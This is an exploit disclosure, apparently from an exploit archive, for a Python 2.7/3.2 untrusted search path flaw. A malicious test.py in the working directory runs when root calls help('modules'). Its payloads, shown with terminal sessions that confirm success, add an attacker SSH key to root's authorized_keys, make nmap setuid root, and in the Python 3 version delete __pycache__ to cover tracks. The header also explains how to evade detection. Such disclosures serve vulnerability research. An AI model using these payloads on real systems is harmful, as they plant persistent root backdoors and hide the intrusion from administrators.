Python Untrusted Search Path / Code Execution

`# Exploit Title: Python untrusted search path/code execution vulnerability  
# Date: 7.6.12  
# Exploit Author: rogueclown  
# Vendor Homepage: http://www.python.org  
# Software Link: http://www.python.org/getit/releases/  
# Version: python 2.7.2 and python 3.2.1  
# Tested on: linux (my test machine was OpenSUSE 12.1)  
#  
# This is an expansion on www.exploit-db.com/exploits/19523/ -- a big thanks,  
# and the lion's share of the credit, to ShadowHatesYou ([email protected]).  
# They found the vulnerability; i just found a more generalized application  
# of it.  
#  
# Basically, i found that it's not just python-wrapper that executes a test.py  
# script within the current working directory when help('modules') is run --  
# python itself does that. In python 2, it works just as ShadowHatesYou showed  
# it in his python-wrapper exploit.  
#  
# This still works in python 3, but you have to do a bit more to cover your  
# tracks. In the working directory, python 3 drops a __pycache__ directory  
# with a .pyc file inside it. Most of the bytecode in there is not human  
# readable, but it displays the shell command called by the script in  
# plaintext, making it pretty obvious that something funny happened. However,  
# you can get around this by making sure that your test.py script removes the  
# __pycache__ directory from the working directory.  
#  
# rogueclown  
# [email protected]  
# 7.6.12  
  
############  
# PYTHON 2 #  
############  
  
adalia@bukkit:~/security/pythonwrapper> ls -hl test.py  
-rw-r--r-- 1 adalia users 144 Jul 4 15:47 test.py  
adalia@bukkit:~/security/pythonwrapper> cat test.py  
#!/usr/bin/python  
  
import os  
  
os.system("/bin/echo $(echo ssh-rsa rogueclown washere >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap")  
adalia@bukkit:~/security/pythonwrapper> ls -hl /usr/bin/nmap  
-rwxr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap  
adalia@bukkit:~/security/pythonwrapper> su  
Password:  
bukkit:/home/adalia/security/pythonwrapper # ls /root/.ssh/authorized_keys  
ls: cannot access /root/.ssh/authorized_keys: No such file or directory  
bukkit:/home/adalia/security/pythonwrapper # python  
Python 2.7.2 (default, Aug 19 2011, 20:41:43) [GCC] on linux2  
Type "help", "copyright", "credits" or "license" for more information.  
>>> help('modules')  
  
Please wait a moment while I gather a list of all available modules...  
  
  
/usr/lib64/python2.7/site-packages/gobject/constants.py:24: Warning: g_boxed_type_register_static: assertion `g_type_from_name (name) == 0' failed  
import gobject._gobject  
/usr/lib64/python2.7/site-packages/twisted/words/im/__init__.py:8: UserWarning: twisted.im will be undergoing a rewrite at some point in the future.  
warnings.warn("twisted.im will be undergoing a rewrite at some point in the future.")  
** Message: pygobject_register_sinkfunc is deprecated (GstObject)  
Alacarte abc gtkunixprint readline  
BaseHTTPServer aifc gzip repr  
Bastion antigravity hashlib resource  
BeautifulSoup anydbm heapq rexec  
BeautifulSoupTests argparse hmac rfc822  
CDROM array hotshot rlcompleter  
CGIHTTPServer ast hpmudext robotparser  
ConfigParser asynchat htmlentitydefs rpm  
Cookie asyncore htmllib runpy  
Crypto atexit httplib satsolver  
DLFCN atk httplib2 scanext  
DocXMLRPCServer atom ieee1284 sched  
HTMLParser audiodev ihooks scout  
IN base64 imaplib select  
MimeWriter bdb imghdr serial  
OpenSSL beaker imp sets  
PAM binascii importlib setuptools  
PyQt4 binhex imputil sgmllib  
Queue bisect inspect sha  
SimpleHTTPServer bsddb io shelve  
SimpleXMLRPCServer butterfly itertools shlex  
SocketServer bz2 json shutil  
StringIO cPickle keyword signal  
TYPES cProfile lib2to3 simplejson  
UserDict cStringIO libproxy sip  
UserList cairo libvboxjxpcom site  
UserString calendar libxml2 smbc  
VBoxAuth cgi libxml2mod smtpd  
VBoxAuthSimple cgitb linecache smtplib  
VBoxDD chunk linuxaudiodev sndhdr  
VBoxDD2 cmath locale socket  
VBoxDDU cmd logging spwd  
VBoxDbg code louie sqlite3  
VBoxGuestControlSvc codecs macpath sre  
VBoxGuestPropSvc codeop macurl2path sre_compile  
VBoxHeadless coherence mad sre_constants  
VBoxKeyboard collections mailbox sre_parse  
VBoxNetDHCP colorsys mailcap ssl  
VBoxOGLhostcrutil commands mako stat  
VBoxOGLhosterrorspu compileall markupbase statvfs  
VBoxOGLrenderspu compiler markupsafe string  
VBoxPython contextlib marshal stringold  
VBoxPython2_7 cookielib math stringprep  
VBoxREM copy md5 strop  
VBoxRT copy_reg mhlib struct  
VBoxSDL crypt mimetools subprocess  
VBoxSharedClipboard csv mimetypes sunau  
VBoxSharedCrOpenGL ctypes mimify sunaudio  
VBoxSharedFolders cups mmap symbol  
VBoxVMM cupsext modulefinder symtable  
VBoxXPCOM cupshelpers multifile sys  
VBoxXPCOMC curl multiprocessing sysconfig  
VirtualBox datetime mutagen syslog  
Xlib dbhash mutex tabnanny  
_LWPCookieJar dbus mygpoclient tarfile  
_MozillaCookieJar dbus_bindings netrc telepathy  
__builtin__ decimal new telnetlib  
__future__ difflib nis tempfile  
_abcoll dircache nntplib termios  
_ast dis ntpath textwrap  
_bisect distutils nturl2path this  
_bsddb doctest numbers thread  
_codecs drv_libxml2 numpy threading  
_codecs_cn dsextras opcode time  
_codecs_hk dumbdbm operator timeit  
_codecs_iso2022 dummy_thread optparse toaiff  
_codecs_jp dummy_threading os token  
_codecs_kr easy_install os2emxpath tokenize  
_codecs_tw email ossaudiodev trace  
_collections encodings packagekit traceback  
_csv errno pango tty  
_ctypes exceptions pangocairo twisted  
_ctypes_test eyeD3 papyon types  
_dbus_bindings fcntl parser unicodedata  
_dbus_glib_bindings feedparser pcardext unittest  
_elementtree filecmp pdb uno  
_functools fileinput pickle unohelper  
_hashlib fnmatch pickletools urlgrabber  
_heapq formatter pipes urllib  
_hotshot fpformat pkg_resources urllib2  
_io fractions pkgutil urlparse  
_json ftplib platform user  
_locale functools plistlib uu  
_lsprof future_builtins popen2 uuid  
_md5 gc poplib vboxapi  
_multibytecodec gdata posix vboxshell  
_multiprocessing genericpath posixfile volkeys  
_pyio getopt posixpath warnings  
_random getpass pprint wave  
_satsolver gettext profile weakref  
_sha gi pstats webbrowser  
_sha256 gio pty whichdb  
_sha512 glib pwd wsgiref  
_socket glob py_compile xdg  
_sqlite3 gmenu pyclbr xdrlib  
_sre gnome_sudoku pycurl xml  
_ssl gnomekeyring pydoc xmllib  
_strptime gobject pydoc_data xmlrpclib  
_struct gpod pyexpat xxsubtype  
_symtable gpodder pygst zeitgeist  
_testcapi grp pygtk zipfile  
_threading_local gst pynotify zipimport  
_warnings gstoption quopri zlib  
_weakref gtk random zope  
_weakrefset gtktrayicon re   
  
Enter any module name to get more help. Or, type "modules spam" to search  
for modules whose descriptions contain the word "spam".  
  
>>> exit()  
bukkit:/home/adalia/security/pythonwrapper # ls -hl /usr/bin/nmap  
-rwsr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap  
bukkit:/home/adalia/security/pythonwrapper # cat /root/.ssh/authorized_keys  
ssh-rsa rogueclown washere  
bukkit:/home/adalia/security/pythonwrapper #  
  
  
############  
# PYTHON 3 #  
############  
  
adalia@bukkit:~/security/pythonwrapper> ls -hl test.py  
-rw-r--r-- 1 adalia users 169 Jul 4 15:51 test.py  
adalia@bukkit:~/security/pythonwrapper> cat test.py  
#!/usr/bin/python  
  
import os  
  
os.system("/bin/echo $(echo ssh-rsa rogueclown washere >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap; /bin/rm -rf __pycache__")  
adalia@bukkit:~/security/pythonwrapper> ls -hl /usr/bin/nmap  
-rwxr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap  
adalia@bukkit:~/security/pythonwrapper> su  
Password:  
bukkit:/home/adalia/security/pythonwrapper # ls /root/.ssh/authorized_keys  
ls: cannot access /root/.ssh/authorized_keys: No such file or directory  
bukkit:/home/adalia/security/pythonwrapper # python3  
Python 3.2.1 (default, Jul 18 2011, 16:24:40) [GCC] on linux2  
Type "help", "copyright", "credits" or "license" for more information.  
>>> help('modules')  
  
Please wait a moment while I gather a list of all available modules...  
  
  
CDROM binascii inspect shelve  
DLFCN binhex io shlex  
IN bisect itertools shutil  
TYPES builtins json signal  
__future__ bz2 keyword site  
_abcoll cProfile linecache smtpd  
_ast calendar locale smtplib  
_bisect cgi logging sndhdr  
_codecs cgitb macpath socket  
_codecs_cn chunk macurl2path socketserver  
_codecs_hk cmath mailbox spwd  
_codecs_iso2022 cmd mailcap sqlite3  
_codecs_jp code marshal sre_compile  
_codecs_kr codecs math sre_constants  
_codecs_tw codeop mimetypes sre_parse  
_collections collections mmap ssl  
_compat_pickle colorsys modulefinder stat  
_csv compileall multiprocessing string  
_ctypes concurrent netrc stringprep  
_datetime configparser nis struct  
_dummy_thread contextlib nntplib subprocess  
_elementtree copy ntpath sunau  
_functools copyreg nturl2path symbol  
_hashlib crypt numbers symtable  
_heapq csv opcode sys  
_io ctypes operator sysconfig  
_json datetime optparse syslog  
_locale decimal os tabnanny  
_lsprof difflib os2emxpath tarfile  
_markupbase dis ossaudiodev telnetlib  
_multibytecodec distutils parser tempfile  
_multiprocessing doctest pdb termios  
_pickle dummy_threading pickle textwrap  
_posixsubprocess email pickletools this  
_pyio encodings pipes threading  
_random errno pkgutil time  
_socket fcntl platform timeit  
_sqlite3 filecmp plistlib token  
_sre fileinput poplib tokenize  
_ssl fnmatch posix trace  
_string formatter posixpath traceback  
_strptime fractions pprint tty  
_struct ftplib profile turtle  
_symtable functools pstats types  
_thread gc pty unicodedata  
_threading_local genericpath pwd unittest  
_warnings getopt py_compile urllib  
_weakref getpass pyclbr uu  
_weakrefset gettext pydoc uuid  
abc glob pydoc_data warnings  
aifc grp queue wave  
antigravity gzip quopri weakref  
argparse hashlib random webbrowser  
array heapq re wsgiref  
ast hmac readline xdrlib  
asynchat html reprlib xxlimited  
asyncore http resource xxsubtype  
atexit imaplib rlcompleter zipfile  
audioop imghdr runpy zipimport  
base64 imp sched zlib  
bdb importlib select   
  
Enter any module name to get more help. Or, type "modules spam" to search  
for modules whose descriptions contain the word "spam".  
  
>>> exit()  
bukkit:/home/adalia/security/pythonwrapper # ls -hl /usr/bin/nmap  
-rwsr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap  
bukkit:/home/adalia/security/pythonwrapper # cat /root/.ssh/authorized_keys  
ssh-rsa rogueclown washere  
bukkit:/home/adalia/security/pythonwrapper # ls __pycache__  
ls: cannot access __pycache__: No such file or directory  
bukkit:/home/adalia/security/pythonwrapper #   
  
  
  
  
`